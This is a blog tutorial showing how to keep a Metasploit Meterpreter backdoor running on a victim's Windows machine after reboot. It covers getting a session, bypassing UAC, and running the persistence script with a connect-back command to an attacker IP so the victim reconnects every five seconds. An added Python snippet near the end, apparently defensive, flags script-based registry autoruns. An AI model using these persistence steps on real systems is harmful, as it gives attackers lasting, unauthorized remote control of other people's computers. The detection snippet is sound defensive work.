How To Make Persistent Backdoor After Exploit


Unfortunately, the Meterpreter ceases to work if the victim system is rebooted. As a result, many of you have written me asking whether we can maintain or persist the Meterpreter on the victim system.

The answer is "Yes!" How? Let's find out.

The persistence script creates a backdoor that tries to connect back to the attacker's Metasploit instance, and the connect-back happens at system boot or user logon.

You can also configure the time between connect-back attempts, in case the attacker machine is not currently up and you want the backdoor to keep trying to connect to you. As for how it works: under the hood, the persistence script creates a VBS script on the victim system and adds it to the appropriate registry key so that it runs automatically.


To get system-level or admin privileges, we have to execute it as admin, which is monitored by Windows UAC.

This tutorial assumes that you already have Metasploit installed, or that you are running Kali / BackTrack Linux. If it is not installed, you can download it from https://www.metasploit.com/


Let's Start To Make Persistent Backdoor After Exploit

Step 1 : First, get a Meterpreter session on the victim PC and get admin privileges on it using bypassuac.


How To Bypass UAC And Get Admin Privilege in Windows Using MetaSploit.


Step 2 : We now have a full Meterpreter shell on the target. Now that the session has opened, type sysinfo to get system information.




Step 3 : Type help to see more actions.




Step 4 : Type exit and run the persistence script

Metasploit has a script named persistence that can enable us to set up a persistent Meterpreter (listener) on the victim's system. First, let's take a look at the options that are available when we run this script by using the -h switch:

meterpreter > run persistence -h



Step 5 : Type the command

meterpreter > run persistence -U -i 5 -p 4466 -r 192.168.18.132

This command runs the persistence script, which checks every 5 seconds for a connection (-i 5), connects on port 4466 (-p 4466), and connects to the local system (ours) on IP address 192.168.18.132 (-r 192.168.18.132).


The .vbs file is successfully saved on the victim PC. Opening a second session: we can see that we have opened a Meterpreter session on the victim system.


Step 6 : Now it's time to check whether the backdoor will open a new session for us every time the system boots. So we will reboot the system.

Windows is shutting down




See all sessions automatically closed.


Step 7 : Even after the system reboots, the Meterpreter on the victim system attempts to connect to us every 5 seconds until it has successfully opened a session for us.




Step 8 : Now we have successfully opened a persistent connection on the victim system that we can come back to time and time again.


Step 9 : Now check the open sessions.
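The persistence described above leaves a VBS script on disk and a registry autorun value pointing at it, which is what a defender can look for. The following Python code is an added example, not part of the original article or of Metasploit: it parses `reg query` output and flags autorun values that start a script. The choice of the Run keys, the sample output, the value names and the Temp/AppData heuristic are constructed assumptions.

```python
import re

# Constructed sample of `reg query` output for the two Run keys (not from a real host).
SAMPLE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background
    qWxKzTbn    REG_SZ    C:\Users\alice\AppData\Local\Temp\aBcDeFg.vbs

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Updater    REG_SZ    wscript.exe "C:\ProgramData\upd\check.vbs" //B
"""

# `reg query` prints each value as: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_RE = re.compile(r"^ {4}(?P<name>.+?) {4}(?P<type>REG_\w+) {4}(?P<data>.*)$")
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b", re.I)       # Windows Script Host file types
SCRIPT_HOST = re.compile(r"\b(wscript|cscript)(\.exe)?\b", re.I)  # interpreters for those files
USER_PATH = re.compile(r"\\(temp|appdata)\\|%(temp|appdata)%", re.I)  # assumed drop locations


def parse_run_entries(text):
    """Return (key, value_name, data) tuples from `reg query` style output."""
    key, entries = None, []
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if m and key:
            entries.append((key, m.group("name"), m.group("data").strip()))
    return entries


def find_script_autoruns(text):
    """Flag autorun values that start a script instead of a normal executable."""
    hits = []
    for key, name, data in parse_run_entries(text):
        reasons = []
        if SCRIPT_EXT.search(data):
            reasons.append("script-file")
        if SCRIPT_HOST.search(data):
            reasons.append("script-host")
        if reasons and USER_PATH.search(data):
            reasons.append("user-writable-path")
        if reasons:
            hits.append({"key": key, "name": name, "data": data, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_script_autoruns(SAMPLE):
        print(f'{hit["key"]}\\{hit["name"]}: {hit["data"]} {hit["reasons"]}')
```

A flagged value is a lead for review, not a verdict: some legitimate software also starts scripts from autorun keys, so check the referenced file and when the value was written.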



I hope you enjoyed this article.




About Author

Akash is a co-founder and an aspiring entrepreneur who keeps a close eye on open source, tech giants, and security. Get in touch with him by sending an email (akashchugh1994@gmail.com).

